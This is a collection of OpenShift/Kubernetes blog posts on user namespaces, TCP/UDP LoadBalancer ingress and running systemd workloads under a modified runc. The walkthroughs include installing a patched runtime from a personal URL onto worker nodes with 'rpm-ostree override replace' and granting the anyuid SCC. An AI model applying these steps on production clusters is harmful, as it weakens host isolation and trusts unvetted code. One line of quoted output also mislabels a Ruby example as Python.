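entries = parse_uid_map(UID_MAP)
```

With this map, UID 0 translates to 1000650000 and UID 1 to 265536, whereas UID 1000650000 itself has no mapping inside the namespace. That is the situation behind the "unmapped user" error in the first attempt.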
Objective achieved.
Why runAsUser must be specified §
Referring back to the PodSpec, why is it necessary to explicitly
specify runAsUser? Doesn’t the SCC admission machinery
automatically set the default value? Well… yes, and no. The SCC
machinery defaults runAsUser in each container’s
securityContext field. But it does not set it in the Pod’s
securityContext. And it is the Pod securityContext that CRI-O
examines when processing the map-to-root option. If it is unset,
CRI-O will not set the mapping up properly and container(s) will
fail to run.
The consequence of this is that the user or operator creating the
Pod must first examine the Project or Namespace object to learn what
its assigned UID range is. Then it must set the
spec.securityContext.runAsUser field to the start value of that
range. The range assignment will certainly differ from project to
project so it cannot be hardcoded. This is a bit annoying: more
work for the human operator, or more automation behaviour to
implement and maintain.
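The lookup itself is simple to automate. This Python sketch derives the runAsUser value from the openshift.io/sa.scc.uid-range annotation, assuming the start/size form shown earlier. Fetching the annotation from the cluster is left out, and the function names are hypothetical.

```python
def parse_uid_range(annotation: str) -> range:
    """Turn '<start>/<size>' into the range of UIDs assigned to the project."""
    start, sep, size = annotation.partition("/")
    if not sep:
        raise ValueError("expected '<start>/<size>'")
    return range(int(start), int(start) + int(size))


def pod_security_context(annotation: str) -> dict:
    """Build the Pod-level securityContext with runAsUser at the range start."""
    return {"runAsUser": parse_uid_range(annotation).start}


uids = parse_uid_range("1000650000/10000")
context = pod_security_context("1000650000/10000")
```

For the test project this gives the range 1000650000 to 1000659999, matching the bounds in the admission error above, and a runAsUser of 1000650000.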
The simplest solution I can think of is to enhance the SCC
processing to also set spec.securityContext.runAsUser if it is
unset. Then CRI-O would see the value it needs to see.
Alternatively CRI-O could be enhanced to check the container
securityContext if the runAsUser is not specified in the Pod
securityContext. But to me this seems ill-principled because
different containers (in the same Pod) could specify different
values, and there is no obvious “right” way to resolve the
ambiguities.
Using multiple UIDs §
Although I have a nice range of 65536 UIDs mapped in the Pod’s user
namespace, I am not able to run processes as any UID other than 0.
This is because the restricted SCC forcibly omits CAP_SETUID
(among others) from the capability bounding set of the container
process. Complex workloads, including any based on systemd, will
fail to run properly under such a constraint.
The simplest workaround is to admit the Pod via the anyuid SCC.
But that undoes the good outcome achieved in this post!
An intermediate workaround is to create a new SCC that does not
forcibly deprive containers of CAP_SETUID. This entails
administrative overhead.
It also increases the attack surface. The setuid(2) system call
is restricted to UIDs mapped in the user namespace of the calling
process. If the calling process is in an isolated user namespace
that maps to unprivileged host UIDs, it is safe (up to kernel bugs)
to grant CAP_SETUID to that process. But recall that user
namespaces are still opt-in; by default Pods use the host user
namespace. An SCC can use MustRunAsRange to restrict the
initial container process to running as a user in the project’s
assigned UID range. But if that SCC also lets containers use
CAP_SETUID, then it doesn’t really provide more protection than
anyuid.
A more robust solution would be to modify CRI-O to reinstate
CAP_SETUID and related capabilities when the Pod runs in a user
namespace. I will raise the topic with the CRI-O maintainers, as
solving this problem is important for our use case, and probably
other “legacy” workloads too.
Conclusion §
In this post I demonstrated how to run workloads in a user namespace
on OpenShift, under the default restricted SCC. The map-to-root
option is critical to accomplishing this. There is an unfortunate
“rough edge” in that the workload must specifically refer to the UID
range assigned to the namespace in which the Pod will live, which
means additional work for or complexity in the operator (human or
otherwise).
Despite this progress, if you need to run processes under different
UIDs in the container(s), the restricted SCC won’t work because it
deprives the container process of the CAP_SETUID capability. You
must go back to admitting the workload via anyuid or a similar
SCC, which is a significant erosion of the security boundaries
between containers and the host. This issue will be the subject of
future investigations.


Bare TCP and UDP ingress on Kubernetes
2021-11-18T00:00:00Z
Kubernetes and OpenShift have good solutions for routing HTTP/HTTPS
traffic to the right applications. But for ingress of bare TCP
(that is, not HTTP(S) or TLS with SNI) or UDP traffic, the situation
is more complicated. In this post I demonstrate how to use
LoadBalancer Service objects to route bare TCP and UDP traffic to
your Kubernetes applications.
Example service §
For testing purposes I wrote a basic echo server. It listens on
both TCP and UDP port 12345, and merely upper-cases and returns the
data it receives:
import socketserver
import threading

def serve_tcp():
    class Handler(socketserver.StreamRequestHandler):
        def handle(self):
            while True:
                data = self.rfile.readline()
                if not data:
                    break
                self.wfile.write(data.upper())

    with socketserver.TCPServer(('', 12345), Handler) as server:
        server.serve_forever()

def serve_udp():
    class Handler(socketserver.DatagramRequestHandler):
        def handle(self):
            self.wfile.write(self.rfile.read().upper())

    with socketserver.UDPServer(('', 12345), Handler) as server:
        server.serve_forever()

if __name__ == "__main__":
    threading.Thread(target=serve_tcp).start()
    threading.Thread(target=serve_udp).start()
The Containerfile adds this program to the official Fedora 35
container and declares the entry point:
FROM fedora:35-x86_64
COPY echo.py .
CMD [ "python3", "echo.py" ]
I published the container image on Quay.io. The Pod spec
references it:
apiVersion: v1
kind: Pod
metadata:
  name: echo
  labels:
    app: echo
spec:
  containers:
  - name: server
    image: quay.io/ftweedal/udpecho:latest
I defined a new project namespace echo and created the Pod:
% oc new-project echo
Now using project "echo" on server
  "https://api.ci-ln-4ixdypb-72292.origin-ci-int-gce.dev.rhcloud.com:6443".

…

% oc create -f pod-echo.yaml
pod/echo created
Create Service object §
My application is not talking HTTP, so I can’t use the normal
Ingress or Route facilities to get traffic to my app.

HTTP and HTTPS traffic includes the Host header, which the
ingress system can inspect to route requests to a particular Pod.
Similarly, TLS with the Server Name (SNI) extension allows TLS
traffic to be routed to a particular Pod (the Pod will perform the
handshake). Neither approach works for UDP packets or “bare” TCP
connections.

Therefore, I define a LoadBalancer Service. The service
controller will ask the cloud provider to create a load balancer
that routes external traffic into the cluster. For example, on AWS
it will (by default) create an ELB (Elastic Load Balancer)
instance.
apiVersion: v1
kind: Service
metadata:
  name: echo
spec:
  type: LoadBalancer
  selector:
    app: echo
  ports:
  - name: tcpecho
    protocol: TCP
    port: 12345
  - name: udpecho
    protocol: UDP
    port: 12345
OK, let’s create the Service:
% oc create -f service-echo.yaml 
The Service "echo" is invalid: spec.ports: Invalid value:
[]core.ServicePort{core.ServicePort{Name:"tcpecho", Protocol:"TCP",
AppProtocol:(*string)(nil), Port:12345,
TargetPort:intstr.IntOrString{Type:0, IntVal:12345, StrVal:""},
NodePort:0}, core.ServicePort{Name:"udpecho", Protocol:"UDP",
AppProtocol:(*string)(nil), Port:12345,
TargetPort:intstr.IntOrString{Type:0, IntVal:12345, StrVal:""},
NodePort:0}}: may not contain more than 1 protocol when type is
'LoadBalancer'
Well, that’s unfortunate. Kubernetes does not support
LoadBalancer services with mixed protocol. KEP 1435 is in
progress to address this. It is a gated “alpha” feature since
Kubernetes 1.20. Cloud provider support is
currently mixed but work is ongoing.
So for now, I have to create separate Service objects for UDP and
TCP ingress. As a consequence, there will be different public IP
addresses for TCP and UDP. Whether this is a problem depends on
the application. Applications that use SRV records to locate
servers can handle this scenario. Kerberos is such an application
(modern implementations, at least). Applications that use A or
AAAA records directly might have problems.
The other downside is cost. Cloud providers charge money for load
balancer instances. The more you use, the more you pay.
Below is the definition of my decomposed Service objects:
apiVersion: v1
kind: Service
metadata:
  name: echo-udp
spec:
  type: LoadBalancer
  selector:
    app: echo
  ports:
  - name: udpecho
    protocol: UDP
    port: 12345
---
apiVersion: v1
kind: Service
metadata:
  name: echo-tcp
spec:
  type: LoadBalancer
  selector:
    app: echo
  ports:
  - name: tcpecho
    protocol: TCP
    port: 12345
Creating the objects now succeeds:
% oc create -f service-echo.yaml 
service/echo-udp created
service/echo-tcp created
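The decomposition can also be done mechanically. The following is a minimal sketch, assuming the Service manifest has already been loaded into a Python dict; the function name split_by_protocol and the NAME-PROTOCOL naming scheme are illustrative choices, not something Kubernetes prescribes.

```python
import copy


def split_by_protocol(service):
    """Return one Service manifest (dict) per protocol used in spec.ports."""
    by_protocol = {}
    for port in service["spec"]["ports"]:
        # Kubernetes treats a missing protocol field as TCP.
        by_protocol.setdefault(port.get("protocol", "TCP"), []).append(port)

    result = []
    for protocol, ports in by_protocol.items():
        part = copy.deepcopy(service)
        # Hypothetical naming scheme: append the lower-cased protocol.
        part["metadata"]["name"] = (
            service["metadata"]["name"] + "-" + protocol.lower()
        )
        part["spec"]["ports"] = copy.deepcopy(ports)
        result.append(part)
    return result
```

Each resulting dict can be serialised with json.dumps and passed to oc create -f, which accepts JSON as well as YAML.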
To find out the hostname or IP address of the load balancer ingress
endpoint, inspect the status field of the Service object:
% oc get -o json service \
    | jq -c '.items[] | (.metadata.name, .status)'
"echo-tcp"
{"loadBalancer":{"ingress":[{"ip":"34.136.55.93"}]}}
"echo-udp"
{"loadBalancer":{"ingress":[{"ip":"34.71.82.205"}]}}
Most cloud providers report an IP address. That includes Google
Cloud (GCP) where this cluster was deployed. On the other hand, AWS
reports a DNS name. Below is the result of creating my service
objects on a cluster hosted on AWS:
% oc get -o json service \
    | jq -c '.items[] | (.metadata.name, .status)'
"echo-tcp"
{"loadBalancer":{"ingress":[{"hostname":"a095e8e1ebb9e4c64ae71e0f3c688ad4-608097611.us-east-2.elb.amazonaws.com"}]}}
"echo-udp"
{"loadBalancer":{}}
ELB successfully created a load balancer for the TCP port. But
something is wrong with the UDP service. The events give more
information:
% oc get event --field-selector involvedObject.name=echo-udp
LAST SEEN   TYPE      REASON                   OBJECT             MESSAGE
94s         Normal    EnsuringLoadBalancer     service/echo-udp   Ensuring load balancer
94s         Warning   SyncLoadBalancerFailed   service/echo-udp   Error syncing load balancer: failed to ensure load balancer: Protocol UDP not supported by LoadBalancer
Load balancer creation failed with the error:

Error syncing load balancer: failed to ensure load balancer:
Protocol UDP not supported by LoadBalancer

The workaround is to add an annotation to request a Network Load
Balancer (NLB) instance instead of ELB (the default):
apiVersion: v1
kind: Service
metadata:
  name: echo-udp
  annotations:
    service.beta.kubernetes.io/aws-load-balancer-type: "nlb"
spec:
  …
After adding the annotation, both load balancers are configured:
% oc get -o json service \
    | jq -c '.items[] | (.metadata.name, .status)'
"echo-tcp"
{"loadBalancer":{"ingress":[{"hostname":"a473cf621de6b49dfabb6e933d0fab55-2099420434.us-east-2.elb.amazonaws.com"}]}}
"echo-udp"
{"loadBalancer":{"ingress":[{"hostname":"af7f7ed0f44c9461dbb54a9a4aedca2c-0c5861432365c726.elb.us-east-2.amazonaws.com"}]}}

aws-load-balancer-type is one of several annotations for modifying
AWS load balancer configuration. See the AWS Cloud Provider
documentation for the full list.
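A program that consumes the Service status has to cope with all three shapes seen above: an ip entry, a hostname entry, or no ingress at all. Here is a minimal sketch, assuming the input is the JSON text printed by oc get -o json service; the function name ingress_endpoints is my own.

```python
import json


def ingress_endpoints(service_list_json):
    """Map each Service name to a list of (kind, value) ingress endpoints.

    kind is "hostname" or "ip". The list is empty when the load
    balancer has not been provisioned (or provisioning failed).
    """
    endpoints = {}
    for item in json.loads(service_list_json)["items"]:
        status = item.get("status", {})
        ingress = status.get("loadBalancer", {}).get("ingress", [])
        found = []
        for entry in ingress:
            for kind in ("hostname", "ip"):
                if kind in entry:
                    found.append((kind, entry[kind]))
        endpoints[item["metadata"]["name"]] = found
    return endpoints
```

An empty list for a Service is the cue to look at its events, as I did for echo-udp.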

Testing the ingress §
Using the IP address or DNS name from the status field, you can
use nc(1) to verify that the server is contactable.
% echo hello | nc 34.136.55.93 12345
HELLO

% nc --udp 34.71.82.205 12345
hello                             -- input
HELLO                             -- response
^D
I was able to talk to my echo server via both TCP and UDP.
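The same check can be scripted. This is a minimal sketch using only the Python standard library; the function names tcp_echo and udp_echo are my own, and the UDP helper assumes an IPv4 endpoint.

```python
import socket


def tcp_echo(host, port, line, timeout=5.0):
    """Send one newline-terminated line over TCP; return the reply line."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(line)
        with sock.makefile("rb") as reader:
            return reader.readline()


def udp_echo(host, port, payload, timeout=5.0):
    """Send one datagram; return the first datagram received in reply."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        # UDP is unreliable, so give up rather than wait forever.
        sock.settimeout(timeout)
        sock.sendto(payload, (host, port))
        data, _addr = sock.recvfrom(65535)
        return data
```

For example, tcp_echo("34.136.55.93", 12345, b"hello\n") should return the upper-cased line if the load balancer and the Pod are both working.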

If using TLS or DTLS, you could instead use OpenSSL’s s_client(1)
to test connectivity.

Use hostname instead of IP address if that is how the cloud provider
reports the ingress endpoint.
Reaching the service via DNS §
The cloud provider has set up the load balancer and the ingress IP
addresses or hostnames are reported in the status field of the
Service object(s). Now you probably wish to set up DNS records so
that clients can use an established domain name to find the server.
I can’t go deep into this topic in this post, because I am still
exploring this problem space myself. But I can describe some
possible solutions at a high level.
One possibility is to teach your application controller to manage
the required DNS records. It would monitor the Service objects and
reconcile the external DNS configuration with what it sees. The
number and kind of records to be created will vary depending on
whether the cloud provider reports the ingress points as hostnames
or IP addresses:

Ingress endpoint   Resolution method   Records needed
hostname           direct              CNAME
hostname           SRV                 SRV
ip                 direct              A/AAAA
ip                 SRV                 A/AAAA and SRV
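
The table is small enough to express as a decision function, which is roughly what a controller would need. A minimal sketch follows; the function name records_needed and the string labels are illustrative only.

```python
def records_needed(endpoint_kind, resolution):
    """Return the DNS record types required for one ingress endpoint.

    endpoint_kind: "hostname" or "ip" (as reported in the Service status)
    resolution:    "direct" (client resolves the name itself) or "SRV"
    """
    if endpoint_kind not in ("hostname", "ip"):
        raise ValueError("unknown endpoint kind: %r" % (endpoint_kind,))
    if resolution not in ("direct", "SRV"):
        raise ValueError("unknown resolution method: %r" % (resolution,))

    records = []
    if endpoint_kind == "ip":
        # An IP endpoint always needs an address record of our own.
        records.append("A/AAAA")
    elif resolution == "direct":
        # A hostname endpoint reached directly is aliased with a CNAME.
        records.append("CNAME")
    if resolution == "SRV":
        # The SRV target is the provider hostname or our A/AAAA name.
        records.append("SRV")
    return records
```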



Most applications have similar needs, so it would make sense to
encapsulate this behaviour in a controller that configures arbitrary
external DNS providers. That’s what the Kubernetes ExternalDNS
project is all about. Provider stability varies; at
time of writing the only stable providers are Google Cloud DNS and
AWS Route 53.
Integration with OpenShift is via the ExternalDNS Operator.
This is an active area of work and ExternalDNS will hopefully be an
officially supported part of OpenShift in a future release.
I haven’t actually played with ExternalDNS yet so can’t say much
more about it at this time. Only that it looks like a very useful
solution!
Finally, recall the caveats I mentioned earlier about applications
that require ingress of both TCP and UDP traffic. KEP 1435,
along with cloud provider support, should resolve this issue
eventually.


Creating user namespaces inside containers
2021-10-15T00:00:00Z
Over the last year I have experimented with user namespace support in
OpenShift. That is, making OpenShift run workloads inside a
separate user namespace. We’re trying to drive this feature
forward, but some people have reservations. Does having processes
running as root inside a user namespace present an increased
security risk? What if there are kernel bugs…
If you’re worried about the security of user namespaces, OpenShift
or Kubernetes user namespace support doesn’t change the game at all.
As I demonstrate in this post, you can create and use user
namespaces inside your workloads right now.
Demo §
I tested on OpenShift 4.9.0 in the default configuration. So, no
explicit user namespace support. I used a stock Fedora container
image with the following Pod spec:
apiVersion: v1
kind: Pod
metadata:
  name: fedora
spec:
  containers:
  - name: fedora
    image: registry.fedoraproject.org/fedora:34-x86_64
    command: ["sleep", "3600"]
    securityContext:
      capabilities:
        drop:
        - CHOWN
        - DAC_OVERRIDE
        - FOWNER
        - FSETID
        - SETPCAP
        - NET_BIND_SERVICE
The Pod will run under the restricted SCC. I explicitly drop a
number of default capabilities.
Next I created a project named userns, and a new user me.
% oc new-project userns
Now using project "userns" on server "https://api.ci-ln-cih2n32-f76d1.origin-ci-int-gce.dev.openshift.com:6443".

You can add applications to this project with the 'new-app' command. For example, try:

    oc new-app rails-postgresql-example

to build a new example application in Ruby. Or use kubectl to deploy a simple Kubernetes application:

    kubectl create deployment hello-node --image=k8s.gcr.io/serve_hostname

% oc create user me
user.user.openshift.io/me created

% oc adm policy add-role-to-user edit me
clusterrole.rbac.authorization.k8s.io/edit added: "me"
Operating as me I created the pod:
% oc --as me create -f pod-fedora.yaml
pod/fedora created
Soon after, the pod is running. I can see what node it is running
on, and its CRI-O container ID:
% oc get -o json pod/fedora \
    | jq '.status.phase,
          .spec.nodeName,
          .status.containerStatuses[0].containerID'
"Running"
"ci-ln-cih2n32-f76d1-sjtwq-worker-a-qr5hr"
"cri-o://d164163951604b7fc9506b3a390ec6a14c76dc6077406fc7b5ffcbf81c406f68"
Next I started a shell in my container. I’ll leave it running for
now, and come back to it later:
% oc exec -it pod/fedora /bin/sh
sh-5.1$
In another terminal, I opened a debug shell on the worker node.
Then I used crictl to find out the process ID (pid) of the main
container process.
% oc debug node/ci-ln-cih2n32-f76d1-sjtwq-worker-a-qr5hr
Starting pod/ci-ln-cih2n32-f76d1-sjtwq-worker-a-qr5hr-debug ...
To use host binaries, run `chroot /host`
Pod IP: 10.0.128.2
If you don't see a command prompt, try pressing enter.
sh-4.4# chroot /host
sh-4.4# crictl inspect d1641639 | jq .info.pid
18668
Next I used pgrep to find all the processes that share the same
set of namespaces as process 18668. In other words, processes
running in the same pod sandbox.
sh-4.4# pgrep --ns 18668 \
    | xargs ps -o user,pid,cmd --sort pid
USER         PID CMD
1000580+   18668 sleep 3600
1000580+   26490 /bin/sh
There are two processes, running under an unprivileged UID. The UID
comes from a unique range allocated for the userns project. These
two processes are the main container process (sleep), and the
shell that I executed a few steps ago. As expected.
Now for the fun part. Back to the shell we opened in pod/fedora.
Observe that this shell process has an empty capability set:
sh-5.1$ grep Cap /proc/$$/status
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000000000000000
CapAmb: 0000000000000000
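Each Cap* value is a hexadecimal bitmask in which bit N stands for capability number N. The following minimal sketch decodes such output; the capability numbers are taken from linux/capability.h (the table is deliberately partial), and the helper names are my own.

```python
# Partial table of capability numbers from <linux/capability.h>.
CAPS = {
    "CAP_CHOWN": 0,
    "CAP_DAC_OVERRIDE": 1,
    "CAP_FOWNER": 3,
    "CAP_FSETID": 4,
    "CAP_KILL": 5,
    "CAP_SETGID": 6,
    "CAP_SETUID": 7,
    "CAP_SETPCAP": 8,
    "CAP_NET_BIND_SERVICE": 10,
}


def parse_cap_sets(status_text):
    """Extract the Cap* bitmasks from the text of /proc/<pid>/status."""
    sets = {}
    for line in status_text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.startswith("Cap"):
            sets[key] = int(value.strip(), 16)
    return sets


def has_cap(mask, name):
    """Return True if the named capability's bit is set in the mask."""
    return bool((mask >> CAPS[name]) & 1)
```

Applied to the output above, has_cap reports False for every capability in every set, including CAP_SETUID in the bounding set.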
And yet, using unshare(1) I was able to create a new user
namespace. The -r option says to map root in the new user
namespace to the user that created the namespace. And that is
indeed what happens:
sh-5.1$ unshare -U -r
[root@fedora /]# id
uid=0(root) gid=0(root) groups=0(root),65534(nobody)
I confirmed it via the node debug shell. I ran pgrep again, this
time restricting the search to processes in the same pid namespace
as process 18668. The --nslist option gives the list of
namespaces to match (all namespaces when not specified).
sh-4.4# pgrep --ns 18668 --nslist pid \
    | xargs ps -o user,pid,cmd --sort pid
USER         PID CMD
1000580+   18668 sleep 3600
1000580+   26490 /bin/sh
1000580+   36704 -sh
The new shell has pid 36704. Observe that UID 0 in the
container maps to UID 1000580000:
sh-4.4# cat /proc/36704/uid_map
         0 1000580000          1
Discussion §
You can create and use user namespaces inside your containers
without any special support from OpenShift or Kubernetes.
Therefore, the idea of an OpenShift or Kubernetes feature for running
a workload in an isolated user namespace by default does not lead
to an increased risk of container escapes or privilege escalation
related to processes running as uid 0 in a user namespace.
This is not to gloss over the fact that other parts of a “workloads
in user namespaces” feature have to be designed and implemented with
care. Particular aspects include pod admission and selection of the
unprivileged UIDs to map to. But on the question of the security of
the Linux user namespaces feature itself, a first class OpenShift or
Kubernetes feature doesn’t introduce any new risk. Whatever risk
there is, is there right now.
If some critical security issue with user namespaces emerges and you need
an urgent mitigation, the only option is to alter the container
runtime Seccomp policies to block the unshare(2) syscall. This is
an advanced topic, involving changes to node configuration. For
details, see Configuring seccomp profiles in the
official OpenShift documentation.


Demo: namespaced systemd workloads on OpenShift
2021-07-22T00:00:00Z
I have spent much of the last year diving deep into OpenShift’s
container runtime. The goal: work out how to run systemd-based
workloads in user namespaces on OpenShift nodes. The exploration
took many twists and turns. But finally, I have achieved the goal.
In this post I recap the journey so far, and
demonstrate what I have achieved. Then I will
summarise the path(s?) forward from here.
The journey so far §
My previous post
gives an overview of the FreeIPA on OpenShift project. In
particular, it explains our decision to use a “monolithic”
systemd-based container. That implementation approach exposed
capability gaps in OpenShift and led to a long running series of
investigations. I wrote up the results of these investigations
across several blog posts, summarised here:
OpenShift and user namespaces §
I observed that OpenShift (4.6 at the time) did not isolate
containers in user namespaces. I noted that KEP-127 proposes
user namespace support for Kubernetes (it is still being worked
on). CRI-O had also recently added support for user namespaces
via annotations.
User namespaces in OpenShift via CRI-O annotations §
I tested CRI-O’s annotation-based user namespace support on
OpenShift 4.7 nightlies. I found that the runtime creates a sandbox
with a user namespace and the expected UID mappings. I also found
that it is necessary to override the net.ipv4.ping_group_range
sysctl. Also, the SCC enforcement machinery does not know about
user namespaces and therefore the account that creates the container
requires the anyuid SCC. These deficiencies still exist today.
User namespace support in OpenShift 4.7 §
I continued my investigation after the release of OpenShift 4.7.
With the aforementioned caveats, user namespaces work. I also noted
an inconsistent treatment of securityContext: specifying
runAsUser in the PodSpec maps the container’s UID 0 to host
UID 0—a dangerous configuration.
More recently, I noticed that the userns-mode annotation I was
using included map-to-root=true. I now understand that it is this
configuration that causes this mapping behaviour. I no longer
consider it particularly serious. Ideally the SCC enforcement
should learn about user namespaces, and prevent unprivileged users
from creating containers that run as root (or other system
accounts) on the host.
Multiple users in user namespaces on OpenShift §
I verified that workloads that run processes under a variety of user
accounts work as expected in user namespaces. I did not use a
systemd-based workload to verify this.
systemd containers on OpenShift with cgroups v2 §
I observed that systemd-based workloads run successfully in
OpenShift when executed as UID 0 on the host. Such containers can
only be created by accounts granted privileged SCCs (e.g. anyuid).
When running the container under other UIDs, systemd can’t run
because it does not have write permission on the container’s cgroup
directory.
Using runc to explore the OCI Runtime Specification §
I investigated how runc (the OCI runtime used in OpenShift)
operates, and how it creates cgroups. I identified some potential
ways to change the ownership of the container cgroup to the
container’s UID 0.
systemd, cgroups and subuid ranges §
I discovered that the systemd transient unit API (which runc
uses to create container cgroups) allows specifying a different
owner for the new cgroup. Unfortunately, the user must be “known”,
in the form of a passwd entity via NSSwitch. A proposal to relax
this requirement was provisionally rejected. Other approaches
include writing an NSSwitch module to synthesise passwd entities
for subuids, or
modifying runc to chown(2) the container cgroup after systemd
creates it. I decided to experiment with the latter approach.
Modifying runc to chown the container cgroup §
The main challenge in modifying runc was getting my head around
the unfamiliar codebase. The actual operations are straightforward.
There are two main aspects.
The first aspect is to compute the appropriate owner UID for the
cgroup, and tell it to the cgroup manager object. I described the
algorithm in a previous post. The config.HostRootUID() method
already implements this computation. I was able to reuse it.
The second aspect is to actually chown(2) the relevant cgroup
files and directories. I previously observed systemd’s behaviour
when creating units owned by arbitrary users. systemd chowns the
container’s cgroup directory, and the cgroup.procs,
cgroup.subtree_control and cgroup.threads files within that
directory. runc will do the same. The cgroup manager object
already knows the path to the container cgroup directory. It
changes the owner of the directory and same three files as systemd
to the relevant user.
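To make the second aspect concrete, here is the operation sketched in Python. This is an illustration only: runc is written in Go, this is not the actual patch, and the function name chown_cgroup is hypothetical. Only the owner is changed; the group is left alone.

```python
import os

# The files that systemd hands over when it delegates a cgroup.
CGROUP_FILES = ("cgroup.procs", "cgroup.subtree_control", "cgroup.threads")


def chown_cgroup(cgroup_dir, uid):
    """Make uid the owner of a cgroup directory and its delegation files.

    Returns the list of paths whose owner was set.
    """
    paths = [cgroup_dir]
    paths.extend(os.path.join(cgroup_dir, name) for name in CGROUP_FILES)
    for path in paths:
        # A gid of -1 tells chown(2) to leave the group unchanged.
        os.chown(path, uid, -1)
    return paths
```

The uid argument would be the host UID that maps to UID 0 in the container's user namespace.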
Demo §
Following is a step-by-step demonstration starting with a fresh
deployment of OpenShift 4.7.20.
% oc get clusterversion
NAME      VERSION   AVAILABLE   PROGRESSING   SINCE   STATUS
version   4.7.20    True        False         8m52s   Cluster version is 4.7.20

There is a regression in OpenShift 4.8.0 that prevents Pod
annotations from being propagated to container OCI configurations.
As a consequence, runc does not receive the annotations that trigger
the experimental behaviour. I filed a pull request that fixes the
issue. The patch was accepted and the fix released in OpenShift
4.8.4.

The latent credential is the cluster admin user. Where relevant,
I use the oc --as USER option to execute commands as other users.
% oc whoami
system:admin
Install modified runc package §
List the nodes in the cluster:
% oc get node
NAME                                       STATUS   ROLES    AGE   VERSION
ci-ln-jqbnbfk-f76d1-gnkkv-master-0         Ready    master   61m   v1.20.0+01c9f3f
ci-ln-jqbnbfk-f76d1-gnkkv-master-1         Ready    master   61m   v1.20.0+01c9f3f
ci-ln-jqbnbfk-f76d1-gnkkv-master-2         Ready    master   61m   v1.20.0+01c9f3f
ci-ln-jqbnbfk-f76d1-gnkkv-worker-a-vrbnv   Ready    worker   52m   v1.20.0+01c9f3f
ci-ln-jqbnbfk-f76d1-gnkkv-worker-b-dxk6k   Ready    worker   52m   v1.20.0+01c9f3f
ci-ln-jqbnbfk-f76d1-gnkkv-worker-c-db89w   Ready    worker   52m   v1.20.0+01c9f3f
For each worker node, open a node debug shell and use rpm-ostree override replace to install the modified runc (one worker shown):
% oc debug node/ci-ln-jqbnbfk-f76d1-gnkkv-worker-a-vrbnv
Starting pod/ci-ln-jqbnbfk-f76d1-gnkkv-worker-a-vrbnv-debug ...
To use host binaries, run `chroot /host`
Pod IP: 10.0.32.2
If you don't see a command prompt, try pressing enter.
sh-4.2# chroot /host
sh-4.4# rpm-ostree override replace https://ftweedal.fedorapeople.org/runc-1.0.0-990.rhaos4.8.gitcd80260.el8.x86_64.rpm
Downloading 'https://ftweedal.fedorapeople.org/runc-1.0.0-990.rhaos4.8.gitcd80260.el8.x86_64.rpm'... done!
Checking out tree 9767154... done
No enabled rpm-md repositories.
Importing rpm-md... done
Resolving dependencies... done
Applying 1 override
Processing packages... done
Running pre scripts... done
Running post scripts... done
Running posttrans scripts... done
Writing rpmdb... done
Writing OSTree commit... done
Staging deployment... done
Upgraded:
  runc 1.0.0-96.rhaos4.8.gitcd80260.el8 -> 1.0.0-990.rhaos4.8.gitcd80260.el8
Run "systemctl reboot" to start a reboot

Instead of installing the modified runc on all worker nodes, you
could update one node and use .spec.affinity.nodeAffinity in the PodSpec
to force the pod to run on that node.

Don’t worry about the restart right now (it will happen in the next
step). Exit the debug shell:
sh-4.4# exit
sh-4.2# exit

Removing debug pod ...
Enable user namespaces and cgroups v2 §
The following MachineConfig enables cgroups v2 and CRI-O
annotation-based user namespace support:
apiVersion: machineconfiguration.openshift.io/v1
kind: MachineConfig
metadata:
  labels:
    machineconfiguration.openshift.io/role: worker
  name: userns-cgv2
spec:
  kernelArguments:
    - systemd.unified_cgroup_hierarchy=1
    - cgroup_no_v1="all"
    - psi=1
  config:
    ignition:
      version: 3.1.0
    storage:
      files:
      - path: /etc/crio/crio.conf.d/99-crio-userns.conf
        overwrite: true
        contents:
          source: data:text/plain;charset=utf-8;base64,W2NyaW8ucnVudGltZS5ydW50aW1lcy5ydW5jXQphbGxvd2VkX2Fubm90YXRpb25zPVsiaW8ua3ViZXJuZXRlcy5jcmktby51c2VybnMtbW9kZSJdCg==
      - path: /etc/subuid
        overwrite: true
        contents:
          source: data:text/plain;charset=utf-8;base64,Y29yZToxMDAwMDA6NjU1MzYKY29udGFpbmVyczoyMDAwMDA6MjY4NDM1NDU2Cg==
      - path: /etc/subgid
        overwrite: true
        contents:
          source: data:text/plain;charset=utf-8;base64,Y29yZToxMDAwMDA6NjU1MzYKY29udGFpbmVyczoyMDAwMDA6MjY4NDM1NDU2Cg==
The file /etc/crio/crio.conf.d/99-crio-userns.conf enables CRI-O’s
annotation-based user namespace support. Its content
(base64-encoded in the MachineConfig) is:
[crio.runtime.runtimes.runc]
allowed_annotations=["io.kubernetes.cri-o.userns-mode"]
The MachineConfig also overrides /etc/subuid and /etc/subgid,
defining sub-id ranges for user namespaces. The content is the same
for both files:
core:100000:65536
containers:200000:268435456
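If you want to change these files, the data: URLs have to be regenerated. A minimal sketch of the encoding and decoding, using only the Python standard library, follows; the helper names to_data_url and from_data_url are my own.

```python
import base64

# The media type prefix used by the MachineConfig above.
PREFIX = "data:text/plain;charset=utf-8;base64,"


def to_data_url(text):
    """Encode file content as a base64 data: URL for an Ignition file entry."""
    encoded = base64.b64encode(text.encode("utf-8")).decode("ascii")
    return PREFIX + encoded


def from_data_url(url):
    """Decode a data: URL produced by to_data_url back into text."""
    if not url.startswith(PREFIX):
        raise ValueError("unsupported data URL")
    return base64.b64decode(url[len(PREFIX):]).decode("utf-8")
```

Note that the file content includes the trailing newline; leaving it out produces a different encoding.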
Create the MachineConfig:
% oc create -f machineconfig-userns-cgv2.yaml
machineconfig.machineconfiguration.openshift.io/userns-cgv2 created
Wait for the Machine Config Operator to apply the changes and reboot
the worker nodes:
% oc wait mcp/worker --for condition=updated --timeout=-1s
machineconfigpool.machineconfiguration.openshift.io/worker condition met
It will take several minutes, as worker nodes get rebooted one at a time.
Create project and user §
Create a new project called test:
% oc new-project test
Now using project "test" on server "https://api.ci-ln-jqbnbfk-f76d1.origin-ci-int-gce.dev.openshift.com:6443".

You can add applications to this project with the 'new-app' command. For example, try:

    oc new-app ruby~https://github.com/sclorg/ruby-ex.git

to build a new example application in Python. Or use kubectl to deploy a simple Kubernetes application:

    kubectl create deployment hello-node --image=gcr.io/hello-minikube-zero-install/hello-node
The output shows the public domain name of this cluster:
ci-ln-jqbnbfk-f76d1.origin-ci-int-gce.dev.openshift.com. We need to know
this for creating the route in the next step.
Create a user called test. Grant it admin role on project
test, and the anyuid Security Context Constraint (SCC)
privilege:
% oc create user test
